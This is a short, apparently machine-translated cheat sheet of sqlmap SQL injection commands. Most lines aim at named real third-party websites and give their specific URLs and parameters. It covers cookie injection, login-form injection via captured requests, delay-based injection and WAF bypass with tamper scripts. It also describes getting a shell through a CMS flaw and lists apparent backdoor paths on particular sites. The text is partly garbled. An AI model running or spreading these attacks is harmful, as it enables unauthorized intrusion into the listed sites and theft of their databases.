Sqlmap.py-u "http://www.thinkpadstore.cn/search.php"--cookie "keywords=wcrtestinput000000"--dbs--level 2
Sqlmap.py-u "Http://www.etr.com.cn/index.php?m=yp&c=index&a=list_company&catid=5"--tamper xforwardedfor.py--time-sec=20000--delay=20
Weave Dream Template suffix ad management get the shell add code "&c=assert"
http://www.sinomep.com/pb-admin/error.php
http://www.sinomep.com/pb-admin/error.php
http://www.pcbtech.net/upimg/userup/99/0703/config.php
Request Delay Injection: Access page two error and return to normal
sqlmap.py--dbs-u "url" delay {set number of seconds};
sqlmap.py--dbs-u "url"--safe--freq {set number};
Cookie Injection
Sqlmap.py-u "http://www.ntjx.org/jsj/DownloadShow.asp"--cookie "id=9"--table--level 2
Post Login Box Injection
1. Burpsuite Grasping package Sqlmap.py-r {text injection}ptfupass
2, sqlmap.py-u "url"--from {auto-judgment injection}
3, sqlmap.py-u "url"--data "Tfuname=1&tfupass=1" {Specify login box parameter injection}
Bypass WAF Firewall Injection
Sqlmap.py-u "http://www.xjbtedu.cn/bbs/index.asp?lm=825"-V 3--dbs--batch--tamper "space2hash.py"
Sqlmap.py-u "http://www.jieshun.cn.com/en/show.php?contentid=4368="-tamper xforwardedfor.py-time-sec=2000-delay= 5
Sqlmap.py-u "http://www.cssd.com.cn/show_jtyw.asp?id=343"-tamper xforwardedfor.py-time-sec=2000-delay=5
Delay over dog: sqlmap.py-u "http://www.chem.com.cn/S_Product.aspx?keyword=%
C2%c8%bb%af%ef%a7 "-V 3-tamper" space2comment.py "-time-sec=5--batch-p" id "
Firewall Bypass Ramble